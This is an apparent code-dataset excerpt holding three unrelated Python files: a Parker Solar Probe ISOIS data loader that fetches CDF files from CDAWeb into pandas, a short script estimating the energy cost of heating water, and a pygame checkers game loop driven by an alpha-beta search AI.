seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
35428179764 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import copy
import os
import warnings
import cdflib
import numpy as np
import pandas as pd
import sunpy
from packaging.version import Version
from sunpy.net import Fido
from sunpy.net import attrs as a
from sunpy.timeseries import TimeSeries
from seppy.util import resample_df
# Not needed atm as units are skipped in the modified read_cdf
# if hasattr(sunpy, "__version__") and Version(sunpy.__version__) >= Version("5.0.0"):
# from sunpy.io._cdf import read_cdf, _known_units
# else:
# from sunpy.io.cdf import read_cdf, _known_units
def _fillval_nan(data, fillval):
    """Replace every occurrence of *fillval* in *data* with NaN, in place.

    Integer arrays cannot hold NaN; the resulting ``ValueError`` is swallowed
    deliberately so integer-typed data is returned untouched.
    """
    fill_mask = data == fillval
    try:
        data[fill_mask] = np.nan
    except ValueError:
        # Assigning NaN into an integer-typed array raises; keep data as-is.
        pass
    return data
def _get_cdf_vars(cdf):
    """Return the names of all r- and z-variables in an open CDF file.

    Supports both cdflib < 1.0, where ``cdf_info()`` returns a dict, and
    cdflib >= 1.0, where it returns a dataclass with attributes (mirroring
    the version handling used elsewhere in this module).
    """
    cdf_info = cdf.cdf_info()
    if not isinstance(cdf_info, dict):
        # cdflib >= 1.0 returns a CDFInfo dataclass instead of a dict.
        cdf_info = vars(cdf_info)
    var_list = []
    for attr, value in cdf_info.items():
        # 'rVariables' / 'zVariables' hold the variable name lists.
        if 'variable' in attr.lower() and len(value) > 0:
            var_list.extend(value)
    return var_list
# def _cdf2df_3d_psp(cdf, index_key, dtimeindex=True, ignore=None, include=None):
# """
# Converts a cdf file to a pandas dataframe.
# Note that this only works for 1 dimensional data, other data such as
# distribution functions or pitch angles will not work properly.
# Parameters
# ----------
# cdf : cdf
# Opened CDF file.
# index_key : str
# The CDF key to use as the index in the output DataFrame.
# dtimeindex : bool
# If ``True``, the DataFrame index is parsed as a datetime.
# Default is ``True``.
# ignore : list
# In case a CDF file has columns that are unused / not required, then
# the column names can be passed as a list into the function.
# include : str, list
# If only specific columns of a CDF file are desired, then the column
# names can be passed as a list into the function. Should not be used
# with ``ignore``.
# Returns
# -------
# df : :class:`pandas.DataFrame`
# Data frame with read in data.
# """
# if include is not None:
# if ignore is not None:
# raise ValueError('ignore and include are incompatible keywords')
# if isinstance(include, str):
# include = [include]
# if index_key not in include:
# include.append(index_key)
# # Extract index values
# index_info = cdf.varinq(index_key)
# if index_info['Last_Rec'] == -1:
# warnings.warn(f"No records present in CDF file {cdf.cdf_info()['CDF'].name}")
# return_df = pd.DataFrame()
# else:
# index = cdf.varget(index_key)
# try:
# # If there are multiple indexes, take the first one
# # TODO: this is just plain wrong, there should be a way to get all
# # the indexes out
# index = index[...][:, 0]
# except IndexError:
# pass
# if dtimeindex:
# index = cdflib.epochs.CDFepoch.breakdown(index, to_np=True)
# index_df = pd.DataFrame({'year': index[:, 0],
# 'month': index[:, 1],
# 'day': index[:, 2],
# 'hour': index[:, 3],
# 'minute': index[:, 4],
# 'second': index[:, 5],
# 'ms': index[:, 6],
# })
# # Not all CDFs store pass milliseconds
# try:
# index_df['us'] = index[:, 7]
# index_df['ns'] = index[:, 8]
# except IndexError:
# pass
# index = pd.DatetimeIndex(pd.to_datetime(index_df), name='Time')
# data_dict = {}
# npoints = len(index)
# var_list = _get_cdf_vars(cdf)
# keys = {}
# # Get mapping from each attr to sub-variables
# for cdf_key in var_list:
# if ignore:
# if cdf_key in ignore:
# continue
# elif include:
# if cdf_key not in include:
# continue
# if cdf_key == 'Epoch':
# keys[cdf_key] = 'Time'
# else:
# keys[cdf_key] = cdf_key
# # Remove index key, as we have already used it to create the index
# keys.pop(index_key)
# # Remove keys for data that doesn't have the right shape to load in CDF
# # Mapping of keys to variable data
# vars = {}
# for cdf_key in keys.copy():
# try:
# vars[cdf_key] = cdf.varget(cdf_key)
# except ValueError:
# vars[cdf_key] = ''
# for cdf_key in keys:
# var = vars[cdf_key]
# if type(var) is np.ndarray:
# key_shape = var.shape
# if len(key_shape) == 0 or key_shape[0] != npoints:
# vars.pop(cdf_key)
# else:
# vars.pop(cdf_key)
# # Loop through each key and put data into the dataframe
# for cdf_key in vars:
# df_key = keys[cdf_key]
# # Get fill value for this key
# # First catch string FILLVAL's
# if type(cdf.varattsget(cdf_key)['FILLVAL']) is str:
# fillval = cdf.varattsget(cdf_key)['FILLVAL']
# else:
# try:
# fillval = float(cdf.varattsget(cdf_key)['FILLVAL'])
# except KeyError:
# fillval = np.nan
# if isinstance(df_key, list):
# for i, subkey in enumerate(df_key):
# data = vars[cdf_key][...][:, i]
# data = _fillval_nan(data, fillval)
# data_dict[subkey] = data
# else:
# # If ndims is 1, we just have a single column of data
# # If ndims is 2, have multiple columns of data under same key
# # If ndims is 3, have multiple columns of data under same key, with 2 sub_keys (e.g., energy and pitch-angle)
# key_shape = vars[cdf_key].shape
# ndims = len(key_shape)
# if ndims == 1:
# data = vars[cdf_key][...]
# data = _fillval_nan(data, fillval)
# data_dict[df_key] = data
# elif ndims == 2:
# for i in range(key_shape[1]):
# data = vars[cdf_key][...][:, i]
# data = _fillval_nan(data, fillval)
# data_dict[f'{df_key}_{i}'] = data
# elif ndims == 3:
# for i in range(key_shape[2]):
# for j in range(key_shape[1]):
# data = vars[cdf_key][...][:, j, i]
# data = _fillval_nan(data, fillval)
# data_dict[f'{df_key}_E{i}_P{j}'] = data
# return_df = pd.DataFrame(index=index, data=data_dict)
# return return_df
def psp_isois_load(dataset, startdate, enddate, epilo_channel='F', epilo_threshold=None, path=None, resample=None, all_columns=False):
    """
    Downloads CDF files via SunPy/Fido from CDAWeb for the ISOIS instrument
    suite (EPIHI, EPILO) onboard Parker Solar Probe (PSP).

    Parameters
    ----------
    dataset : {str}
        Name of PSP dataset:
        - 'PSP_ISOIS-EPIHI_L2-HET-RATES60'
        - 'PSP_ISOIS-EPIHI_L2-HET-RATES3600' (higher coverage than 'RATES60' before mid-2021)
        - 'PSP_ISOIS-EPIHI_L2-LET1-RATES60' (not yet supported)
        - 'PSP_ISOIS-EPIHI_L2-LET2-RATES60' (not yet supported)
        - 'PSP_ISOIS-EPILO_L2-PE'
        - 'PSP_ISOIS-EPILO_L2-IC'
    startdate, enddate : {datetime or str}
        Datetime object (e.g., dt.date(2021,12,31) or dt.datetime(2021,4,15)) or "standard"
        datetime string (e.g., "2021/04/15") (enddate must always be later than startdate)
    epilo_channel : string
        'E', 'F', 'G' (for 'EPILO PE'), or 'C', 'D', 'P', 'R', 'T' (for 'EPILO IC').
        EPILO chan, by default 'F'
    epilo_threshold : {int or float}, optional
        Replace ALL flux/countrate values above 'epilo_threshold' with np.nan, by default None.
        Only works for Electron count rates in 'PSP_ISOIS-EPILO_L2-PE' dataset
    path : {str}, optional
        Local path for storing downloaded data, by default None
    resample : {str}, optional
        resample frequency in format understandable by Pandas, e.g. '1min', by default None
    all_columns : {boolean}, optional
        Whether to return all columns of the datafile for EPILO (or skip
        usually unneeded columns for better performance), by default False

    Returns
    -------
    df : {Pandas dataframe}
        See links above for the different datasets for a description of the dataframe columns.
        On failure an empty DataFrame (or the empty-string sentinel '' when no
        files were downloaded for EPILO) is returned.
    energies_dict : {dictionary}
        Dictionary containing energy information.
        NOTE: For EPIHI energy values are only loaded from the first day of the interval!
        For EPILO energy values are the mean of the whole loaded interval.
    """
    trange = a.Time(startdate, enddate)
    cda_dataset = a.cdaweb.Dataset(dataset)
    try:
        # Search CDAWeb and translate the result URLs into expected local paths.
        result = Fido.search(trange, cda_dataset)
        filelist = [i[0].split('/')[-1] for i in result.show('URL')[0]]
        filelist.sort()
        if path is None:
            filelist = [sunpy.config.get('downloads', 'download_dir') + os.sep + file for file in filelist]
        elif type(path) is str:
            filelist = [path + os.sep + f for f in filelist]
        downloaded_files = filelist
        # Remove zero-byte leftovers and (re-)download any missing file.
        # NOTE(review): the path returned by Fido.fetch is not used; the code
        # assumes the download lands at the precomputed path in ``filelist``.
        for i, f in enumerate(filelist):
            if os.path.exists(f) and os.path.getsize(f) == 0:
                os.remove(f)
            if not os.path.exists(f):
                downloaded_file = Fido.fetch(result[0][i], path=path, max_conn=1)
        # loading for EPIHI
        if dataset.split('-')[1] == 'EPIHI_L2':
            # downloaded_files = Fido.fetch(result, path=path, max_conn=1)
            # downloaded_files.sort()
            data = TimeSeries(downloaded_files, concatenate=True)
            df = data.to_dataframe()
            # df = read_cdf(downloaded_files[0])
            # reduce data frame to only H_Flux, H_Uncertainty, Electron_Counts, and Electron_Rate.
            # There is no Electron_Uncertainty, maybe one could use at least the Poission error from Electron_Counts for that.
            # df = df.filter(like='H_Flux') + df.filter(like='H_Uncertainty') + df.filter(like='Electrons')
            # Keep only the proton flux/uncertainty and electron columns for both
            # telescopes A and B (same selection for all EPIHI sub-products).
            if dataset.split('-')[2].upper() == 'HET':
                if dataset.split('-')[3] == 'RATES60':
                    selected_cols = ["A_H_Flux", "B_H_Flux", "A_H_Uncertainty", "B_H_Uncertainty", "A_Electrons", "B_Electrons"]
                if dataset.split('-')[3] == 'RATES3600':
                    selected_cols = ["A_H_Flux", "B_H_Flux", "A_H_Uncertainty", "B_H_Uncertainty", "A_Electrons", "B_Electrons"]
            if dataset.split('-')[2].upper() == 'LET1':
                selected_cols = ["A_H_Flux", "B_H_Flux", "A_H_Uncertainty", "B_H_Uncertainty", "A_Electrons", "B_Electrons"]
            if dataset.split('-')[2].upper() == 'LET2':
                selected_cols = ["A_H_Flux", "B_H_Flux", "A_H_Uncertainty", "B_H_Uncertainty", "A_Electrons", "B_Electrons"]
            df = df[df.columns[df.columns.str.startswith(tuple(selected_cols))]]
            # Energy metadata is read from the FIRST file only (see docstring note).
            cdf = cdflib.CDF(downloaded_files[0])
            # remove this (i.e. following line) when sunpy's read_cdf is updated,
            # and FILLVAL will be replaced directly, see
            # https://github.com/sunpy/sunpy/issues/5908
            # df = df.replace(cdf.varattsget('A_H_Flux')['FILLVAL'], np.nan)
            # 4 Apr 2023: previous 1 lines removed because they are taken care of with sunpy
            # 4.1.0:
            # https://docs.sunpy.org/en/stable/whatsnew/changelog.html#id7
            # https://github.com/sunpy/sunpy/pull/5956
            # get info on energies and units
            energies_dict = {"H_ENERGY":
                             cdf['H_ENERGY'],
                             "H_ENERGY_DELTAPLUS":
                             cdf['H_ENERGY_DELTAPLUS'],
                             "H_ENERGY_DELTAMINUS":
                             cdf['H_ENERGY_DELTAMINUS'],
                             "H_ENERGY_LABL":
                             cdf['H_ENERGY_LABL'],
                             "H_FLUX_UNITS":
                             cdf.varattsget('A_H_Flux')['UNITS'],
                             "Electrons_ENERGY":
                             cdf['Electrons_ENERGY'],
                             "Electrons_ENERGY_DELTAPLUS":
                             cdf['Electrons_ENERGY_DELTAPLUS'],
                             "Electrons_ENERGY_DELTAMINUS":
                             cdf['Electrons_ENERGY_DELTAMINUS'],
                             "Electrons_ENERGY_LABL":
                             cdf['Electrons_ENERGY_LABL'],
                             "Electrons_Rate_UNITS":
                             cdf.varattsget('A_Electrons_Rate')['UNITS']
                             }
        # loading for EPILO
        if dataset.split('-')[1] == 'EPILO_L2':
            if dataset[-2:] == 'PE':
                species_str = 'Electron'
            elif dataset[-2:] == 'IC':
                species_str = 'H'
            if len(downloaded_files) > 0:
                # Build the list of variables to skip (housekeeping/coordinate
                # columns) unless the caller explicitly wants everything.
                if all_columns:
                    ignore = []
                else:
                    ignore = [f'Epoch_Chan{epilo_channel}_DELTA', f'HCI_Chan{epilo_channel}', f'HCI_Lat_Chan{epilo_channel}', f'HCI_Lon_Chan{epilo_channel}',
                              f'HCI_R_Chan{epilo_channel}', f'HGC_Lat_Chan{epilo_channel}', f'HGC_Lon_Chan{epilo_channel}', f'HGC_R_Chan{epilo_channel}',
                              f'{species_str}_Chan{epilo_channel}_Energy_LABL', f'{species_str}_Counts_Chan{epilo_channel}', f'RTN_Chan{epilo_channel}']
                # ignore = ['Epoch_ChanP_DELTA', 'HCI_ChanP', 'HCI_Lat_ChanP', 'HCI_Lon_ChanP', 'HCI_R_ChanP', 'HGC_Lat_ChanP', 'HGC_Lon_ChanP', 'HGC_R_ChanP', 'H_ChanP_Energy', 'H_ChanP_Energy_DELTAMINUS', 'H_ChanP_Energy_DELTAPLUS', 'H_ChanP_Energy_LABL', 'H_CountRate_ChanP', 'H_Counts_ChanP', 'H_Flux_ChanP', 'H_Flux_ChanP_DELTA', 'PA_ChanP', 'Quality_Flag_ChanP', 'RTN_ChanP', 'SA_ChanP
                # read 0th cdf file
                # # cdf = cdflib.CDF(downloaded_files[0])
                # # df = _cdf2df_3d_psp(cdf, f"Epoch_Chan{epilo_channel.upper()}", ignore=ignore)
                df = _read_cdf_psp(downloaded_files[0], f"Epoch_Chan{epilo_channel.upper()}", ignore_vars=ignore)
                # read additional cdf files and append them row-wise
                if len(downloaded_files) > 1:
                    for f in downloaded_files[1:]:
                        # # cdf = cdflib.CDF(f)
                        # # t_df = _cdf2df_3d_psp(cdf, f"Epoch_Chan{epilo_channel.upper()}", ignore=ignore)
                        t_df = _read_cdf_psp(f, f"Epoch_Chan{epilo_channel.upper()}", ignore_vars=ignore)
                        df = pd.concat([df, t_df])
                # columns of returned df for EPILO PE
                # -----------------------------------
                # PA_ChanF_0 to PA_ChanF_7
                # SA_ChanF_0 to SA_ChanF_7
                # Electron_ChanF_Energy_E0_P0 to Electron_ChanF_Energy_E47_P7
                # Electron_ChanF_Energy_DELTAMINUS_E0_P0 to Electron_ChanF_Energy_DELTAMINUS_E47_P7
                # Electron_ChanF_Energy_DELTAPLUS_E0_P0 to Electron_ChanF_Energy_DELTAPLUS_E47_P7
                # Electron_CountRate_ChanF_E0_P0 to Electron_CountRate_ChanF_E47_P7
                # Move the (time-varying) energy columns out of the data frame:
                # store their time-mean in energies_dict and drop them from df.
                energies_dict = {}
                for k in [f'{species_str}_Chan{epilo_channel.upper()}_Energy_E',
                          f'{species_str}_Chan{epilo_channel.upper()}_Energy_DELTAMINUS',
                          f'{species_str}_Chan{epilo_channel.upper()}_Energy_DELTAPLUS']:
                    energies_dict[k] = df[df.columns[df.columns.str.startswith(k)]].mean()
                    df.drop(df.columns[df.columns.str.startswith(k)], axis=1, inplace=True)
                # rename energy column (removing trailing '_E')
                energies_dict[f'{species_str}_Chan{epilo_channel.upper()}_Energy'] = energies_dict.pop(f'{species_str}_Chan{epilo_channel.upper()}_Energy_E')
                # replace outlier data points above given threshold with np.nan
                # note: df.where(cond, np.nan) replaces all values where the cond is NOT fullfilled with np.nan
                # following Pandas Dataframe work is not too elegant, but works...
                if epilo_threshold:
                    # create new dataframe of FLUX columns only with removed outliers
                    df2 = df.filter(like='Electron_CountRate_').where(df.filter(like='Electron_CountRate_') <= epilo_threshold, np.nan)
                    # drop these FLUX columns from original dataframe
                    flux_cols = df.filter(like='Electron_CountRate_').columns
                    df.drop(labels=flux_cols, axis=1, inplace=True)
                    # add cleaned new FLUX columns to original dataframe
                    df = pd.concat([df2, df], axis=1)
            else:
                # Sentinel values when no files could be downloaded.
                df = ''
                energies_dict = ''
        if isinstance(resample, str):
            df = resample_df(df=df, resample=resample, pos_timestamp="center", origin="start")
    except (RuntimeError, IndexError):
        print(f'Unable to obtain "{dataset}" data!')
        downloaded_files = []
        df = pd.DataFrame()
        energies_dict = []
    return df, energies_dict
def calc_av_en_flux_PSP_EPIHI(df, energies, en_channel, species, instrument, viewing):
    """
    This function averages the flux of several energy channels into a combined energy channel
    channel numbers counted from 0
    So far only works for EPIHI-HET

    Parameters
    ----------
    df : pd.DataFrame
        DataFrame containing PSP EPIHI-HET data
    energies : dict
        Energy dict returned from psp_loader
    en_channel : int or list
        energy channel number(s) to be used; a two-element list [first, last]
        selects an inclusive range that is flux-averaged into one channel
    species : string
        'e', 'electrons', 'p', 'i', 'protons', 'ions'
    instrument : string
        'het'
    viewing : string
        'A', 'B'

    Returns
    -------
    pd.DataFrame
        flux_out: contains channel-averaged flux
    str
        en_channel_string: energy range label of the (combined) channel
    """
    if instrument.lower() == 'het':
        if species.lower() in ['e', 'electrons']:
            species_str = 'Electrons'
            flux_key = 'Electrons_Rate'
        if species.lower() in ['p', 'protons', 'i', 'ions', 'h']:
            species_str = 'H'
            flux_key = 'H_Flux'
    # energy-bin labels, e.g. 'x - y MeV', used to build the output string
    en_str = energies[f'{species_str}_ENERGY_LABL']
    if type(en_channel) == list:
        energy_low = en_str[en_channel[0]][0].split('-')[0]
        energy_up = en_str[en_channel[-1]][0].split('-')[-1]
        en_channel_string = energy_low + '-' + energy_up
        # channel widths (upper + lower half-widths) used as averaging weights
        # NOTE(review): DE is only used in the two-channel branch below.
        DE = energies[f'{species_str}_ENERGY_DELTAPLUS']+energies[f'{species_str}_ENERGY_DELTAMINUS']
        if len(en_channel) > 2:
            raise Exception('en_channel must have len 2 or less!')
        if len(en_channel) == 2:
            try:
                # restrict df to the requested telescope/flux columns
                df = df[df.columns[df.columns.str.startswith(f'{viewing.upper()}_{flux_key}')]]
            except (AttributeError, KeyError):
                # NOTE(review): bare ``None`` is a no-op here (acts like ``pass``)
                None
            # width-weighted average over the inclusive channel range
            for bins in np.arange(en_channel[0], en_channel[-1]+1):
                if bins == en_channel[0]:
                    I_all = df[f'{viewing.upper()}_{flux_key}_{bins}'] * DE[bins]
                else:
                    I_all = I_all + df[f'{viewing.upper()}_{flux_key}_{bins}'] * DE[bins]
            DE_total = np.sum(DE[(en_channel[0]):(en_channel[-1]+1)])
            flux_out = pd.DataFrame({'flux': I_all/DE_total}, index=df.index)
        else:
            # single-element list: no averaging needed
            en_channel = en_channel[0]
            flux_out = pd.DataFrame({'flux': df[f'{viewing.upper()}_{flux_key}_{en_channel}']}, index=df.index)
    else:
        # plain int channel: pick the single column directly
        flux_out = pd.DataFrame({'flux': df[f'{viewing.upper()}_{flux_key}_{en_channel}']}, index=df.index)
        en_channel_string = en_str[en_channel][0]
    # replace multiple whitespaces with single ones
    en_channel_string = ' '.join(en_channel_string.split())
    return flux_out, en_channel_string
def calc_av_en_flux_PSP_EPILO(df, en_dict, en_channel, species, mode, chan, viewing):
    """
    This function averages the flux of several energy channels (and viewing
    directions) into a combined energy channel.
    Channel numbers counted from 0.
    So far only works for EPILO PE chanF electrons.

    Parameters
    ----------
    df : pd.DataFrame
        DataFrame containing PSP EPILO data
    en_dict : dict
        Energy dict returned from psp_loader
    en_channel : int or list
        energy channel number(s) to be used; a two-element list [first, last]
        selects an inclusive range that is flux-averaged into one channel
    species : string
        'e', 'electrons'
    mode : string
        'pe' or 'ic'. EPILO mode
    chan : string
        'E', 'F', 'G', 'P', 'T'. EPILO chan
    viewing : int or list
        EPILO viewing. 0 to 7 for electrons; 0 to 79 for ions
        (ions 70-79 correspond to electrons 7, i.e., the electron wedges are
        split up into 10 viewings for ions)

    Returns
    -------
    pd.DataFrame
        flux_out: channel-averaged flux, averaged over all given viewings
    str
        energy range string of the combined channel (first viewing)
    """
    if mode.lower() == 'pe':
        if species.lower() in ['e', 'electrons']:
            species_str = 'Electron'
            flux_key = 'Electron_CountRate'
    elif mode.lower() == 'ic':
        if species.lower() in ['p', 'protons', 'i', 'ions', 'h']:
            species_str = 'H'
            flux_key = 'H_Flux'
    # normalise scalar arguments to lists
    if type(en_channel) == int:
        en_channel = [en_channel]
    if type(viewing) == int:
        viewing = [viewing]
    df_out = pd.DataFrame()
    en_channel_string_all = []
    for view in viewing:
        # per-viewing energy values and channel widths (DELTAMINUS + DELTAPLUS)
        energy = en_dict[f'{species_str}_Chan{chan}_Energy'][en_dict[f'{species_str}_Chan{chan}_Energy'].keys().str.endswith(f'_P{view}')].values
        energy_low = energy - en_dict[f'{species_str}_Chan{chan}_Energy_DELTAMINUS'][en_dict[f'{species_str}_Chan{chan}_Energy_DELTAMINUS'].keys().str.endswith(f'_P{view}')].values
        energy_high = energy + en_dict[f'{species_str}_Chan{chan}_Energy_DELTAPLUS'][en_dict[f'{species_str}_Chan{chan}_Energy_DELTAPLUS'].keys().str.endswith(f'_P{view}')].values
        DE = en_dict[f'{species_str}_Chan{chan}_Energy_DELTAMINUS'].filter(like=f'_P{view}').values + en_dict[f'{species_str}_Chan{chan}_Energy_DELTAPLUS'].filter(like=f'_P{view}').values
        # build energy string of combined channel
        en_channel_string = np.round(energy_low[en_channel[0]], 1).astype(str) + ' - ' + np.round(energy_high[en_channel[-1]], 1).astype(str) + ' keV'
        if len(en_channel) > 2:
            raise Exception("en_channel must have length 2 or less! Define first and last channel to use (don't list all of them)")
        if len(en_channel) == 2:
            # width-weighted average over the inclusive channel range
            for bins in np.arange(en_channel[0], en_channel[-1]+1):
                if bins == en_channel[0]:
                    I_all = df[f"{flux_key}_Chan{chan}_E{bins}_P{view}"] * DE[bins]
                else:
                    I_all = I_all + df[f"{flux_key}_Chan{chan}_E{bins}_P{view}"] * DE[bins]
            DE_total = np.sum(DE[(en_channel[0]):(en_channel[-1]+1)])
            flux_out = pd.DataFrame({f'viewing_{view}': I_all/DE_total}, index=df.index)
        if len(en_channel) == 1:
            # BUGFIX: use a local variable instead of rebinding ``en_channel``
            # to an int -- the old code broke every later loop iteration when
            # multiple viewings were requested with a single channel.
            single_ch = en_channel[0]
            flux_out = pd.DataFrame({f'viewing_{view}': df[f"{flux_key}_Chan{chan}_E{single_ch}_P{view}"]}, index=df.index)
        df_out = pd.concat([df_out, flux_out], axis=1)
        en_channel_string_all.append(en_channel_string)
    # BUGFIX: averaging and return were inside the viewing loop, so the
    # function returned after the FIRST viewing and never combined several
    # viewing directions as documented. Calculate mean of all viewings here:
    df_out2 = pd.DataFrame({'flux': df_out.mean(axis=1, skipna=True)}, index=df_out.index)
    # check if not all elements of en_channel_string_all are the same:
    if len(en_channel_string_all) != en_channel_string_all.count(en_channel_string_all[0]):
        print("You are combining viewing directions that have different energies. This is strongly advised against!")
        print(en_channel_string_all)
    return df_out2, en_channel_string_all[0]
# Backwards-compatible alias for the loader (``copy.copy`` of a function
# returns the very same function object, so this is just a second name).
psp_load = copy.copy(psp_isois_load)
"""
Modification of sunpy's read_cdf function to allow skipping of reading variables from a cdf file.
This function is copied from sunpy under the terms of the BSD 2-Clause licence. See licenses/SUNPY_LICENSE.rst
"""
def _read_cdf_psp(fname, index_key, ignore_vars=None):
    """
    Read a CDF file that follows the ISTP/IACG guidelines.

    Modification of sunpy's ``read_cdf``: only variables depending on the
    single, caller-selected time index are read, variables can be skipped
    explicitly, and (unlike sunpy) physical units are NOT extracted.

    Parameters
    ----------
    fname : path-like
        Location of single CDF file to read.
    index_key : str
        The CDF key to use as the index in the output DataFrame.
        For example, index_key='Epoch_ChanP'
    ignore_vars : list, optional
        In case a CDF file has columns that are unused / not required, then
        the column names can be passed as a list into the function.

    Returns
    -------
    DataFrame
        A Pandas DataFrame for the time index defined by index_key.

    References
    ----------
    Space Physics Guidelines for CDF https://spdf.gsfc.nasa.gov/sp_use_of_cdf.html
    """
    from cdflib.epochs import CDFepoch
    from sunpy import log
    from sunpy.util.exceptions import warn_user

    # BUGFIX: avoid a mutable default argument; normalise None to a tuple.
    if ignore_vars is None:
        ignore_vars = ()

    cdf = cdflib.CDF(str(fname))

    # Extract the time varying variables
    cdf_info = cdf.cdf_info()
    meta = cdf.globalattsget()  # kept from sunpy's read_cdf; currently unused
    # cdflib >= 1.0 returns dataclasses instead of dicts; evaluate the
    # version check once here instead of per variable in the loop below.
    new_cdflib = hasattr(cdflib, "__version__") and Version(cdflib.__version__) >= Version("1.0.0")
    if new_cdflib:
        all_var_keys = cdf_info.rVariables + cdf_info.zVariables
    else:
        all_var_keys = cdf_info['rVariables'] + cdf_info['zVariables']
    var_attrs = {key: cdf.varattsget(key) for key in all_var_keys}
    # Get keys that depend on time
    var_keys = [var for var in var_attrs if 'DEPEND_0' in var_attrs[var] and var_attrs[var]['DEPEND_0'] is not None]

    # Only for the selected index_key (sunpy's original loops over all time
    # indices and builds one TimeSeries per index):
    index = cdf.varget(index_key)
    # TODO: use to_astropy_time() instead here when we drop pandas in timeseries
    index = CDFepoch.to_datetime(index)
    df_dict = {}
    for var_key in var_keys:
        if var_key in ignore_vars:
            continue  # skip var_key entirely
        attrs = var_attrs[var_key]
        # If this variable doesn't depend on this index, continue
        if attrs['DEPEND_0'] != index_key:
            continue
        # Get data
        if new_cdflib:
            var_last_rec = cdf.varinq(var_key).Last_Rec
        else:
            var_last_rec = cdf.varinq(var_key)['Last_Rec']
        if var_last_rec == -1:
            log.debug(f'Skipping {var_key} in {fname} as it has zero elements')
            continue
        data = cdf.varget(var_key)
        # Set fillval values to NaN
        # It would be nice to properly mask these values to work with
        # non-floating point (ie. int) dtypes, but this is not possible with pandas
        if np.issubdtype(data.dtype, np.floating):
            data[data == attrs['FILLVAL']] = np.nan
        # NOTE: unit extraction present in sunpy's read_cdf is deliberately
        # skipped here (the astropy import was removed along with it).
        if data.ndim > 3:
            # Skip data with dimensions >= 3 and give user warning
            warn_user(f'The variable "{var_key}" has been skipped because it has more than 3 dimensions, which is unsupported.')
        elif data.ndim == 3:
            # Multiple columns; label each one <var>_E<j>_P<i>
            # (e.g. energy index and pitch-angle index).
            for j in range(data.T.shape[0]):
                for i, col in enumerate(data.T[j, :, :]):
                    var_key_mod = var_key+f'_E{j}'
                    df_dict[var_key_mod + f'_P{i}'] = col
        elif data.ndim == 2:
            # Multiple columns, give each column a unique label
            for i, col in enumerate(data.T):
                df_dict[var_key + f'_{i}'] = col
        else:
            # Single column
            df_dict[var_key] = data
    df = pd.DataFrame(df_dict, index=pd.DatetimeIndex(name=index_key, data=index))
    if not len(df):
        log.debug(f'No data found in file {fname}')
    return df
| serpentine-h2020/SEPpy | seppy/loader/psp.py | psp.py | py | 31,552 | python | en | code | 5 | github-code | 13 |
28614597959 |
import math
# Specific heat of water in J/(g*degC); 1 ml of water weighs ~1 g.
water_heat_capacity = 4.186
# Price per kWh (currency units as used by the original author).
electricity_price = 8.9
# 1 joule = 1/3,600,000 kWh ~= 2.777e-7 kWh.
# BUGFIX: the original used ``2777*math.e**-7`` (Euler's number!) instead of
# a power of ten for the J -> kWh conversion factor.
kilowatth_hour = 2.777 * 10 ** -7


def calcular_energia(vol, temperature):
    """Joules needed to heat ``vol`` ml of water by ``temperature`` degC (Q = m*c*dT)."""
    return vol * temperature * water_heat_capacity


def calcular_costo(q):
    """Cost of ``q`` joules of energy at ``electricity_price`` per kWh.

    BUGFIX: converting J -> kWh and applying the price are multiplications;
    the original script *added* the conversion factor and the price instead.
    """
    return q * kilowatth_hour * electricity_price


if __name__ == '__main__':
    vol = float(input('Ingrese cantidad de agua:'))
    temperature = float(input('Ingrese tempreatura: '))
    q = calcular_energia(vol, temperature)
    print('Se requieren %d joules de energia' % q)
    print('Costo de energia: %.2f' % calcular_costo(q))
| Lusarom/progAvanzada | ejercicio17.py | ejercicio17.py | py | 367 | python | en | code | 1 | github-code | 13 |
28880445475 | from checkers.constants import WIDTH, HEIGHT, SQUARE_SIZE, BLACK, DARK_BEIGE, WHITE
from checkers.game import Game
from minimax.minimax import minimax
from minimax.alpha_beta import alpha_beta
from monte_carlo.monte_carlo_tree_search import monte_carlo_tree_search
import pygame
# Frame-rate cap for the main game loop.
FPS = 60
# Main display surface for the whole game.
WINDOW = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption('Checkers')
# NOTE(review): ``global`` at module level is a no-op and ``nodes`` is never
# defined or used in this file -- presumably leftover search instrumentation.
global nodes
def get_row_col_from_mouse(pos):
    """Translate a pixel position ``(x, y)`` into a ``(row, col)`` board square."""
    x, y = pos
    return y // SQUARE_SIZE, x // SQUARE_SIZE
def main():
    """Run the Checkers game loop.

    White is played by the alpha-beta AI (depth 6); Black is played by a
    human via mouse clicks. The loop ends when a winner is found or the
    window is closed.
    """
    run = True
    pygame.font.init()
    clock = pygame.time.Clock()
    game = Game(WINDOW)
    font = pygame.font.Font('freesansbold.ttf', 20)
    neg_inf = float('-inf')
    pos_inf = float('inf')
    while run:
        clock.tick(FPS)
        depth = 6  # alpha-beta search depth
        if game.turn == WHITE:
            # Alternative AIs kept for experimentation:
            #value, new_board = minimax(game.get_board(), depth, True, game, 2, WHITE, BLACK)
            #new_board = monte_carlo_tree_search(game.get_board(), True, WHITE, game, 10, 1, 6)
            value, new_board = alpha_beta(game.get_board(), depth, True, game, 2, WHITE, BLACK, neg_inf, pos_inf)
            if new_board:
                game.ai_move(new_board)
            else:
                # No legal move found for White -> Black wins.
                print("WINNER: BLACK")
                game.update()
                break
            game.update()
            game.change_turn()
        # AI-vs-AI variant (Black also played by the computer), disabled:
        # if game.turn == BLACK:
        #     value, new_board = minimax(game.get_board(), depth, True, game, 2, BLACK, WHITE)
        #value, new_board = alpha_beta(game.get_board(), depth, True, game, 3, BLACK, WHITE, neg_inf, pos_inf)
        #     if new_board:
        #         game.ai_move(new_board)
        #     else:
        #         print("WINNER: WHITE")
        #         game.update()
        #         break
        #     game.update()
        #     game.change_turn()
        if game.winner():
            print("WINNER: ")
            print(("BLACK" if game.winner() == BLACK else "WHITE"))
            game.update()
            break
        # Label showing whose turn it is.
        text = font.render(("Black" if game.turn == BLACK else "White"), True, DARK_BEIGE)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                run = False
            if event.type == pygame.MOUSEBUTTONDOWN:
                pos = pygame.mouse.get_pos()
                row, col = get_row_col_from_mouse(pos)
                game.select(row, col)
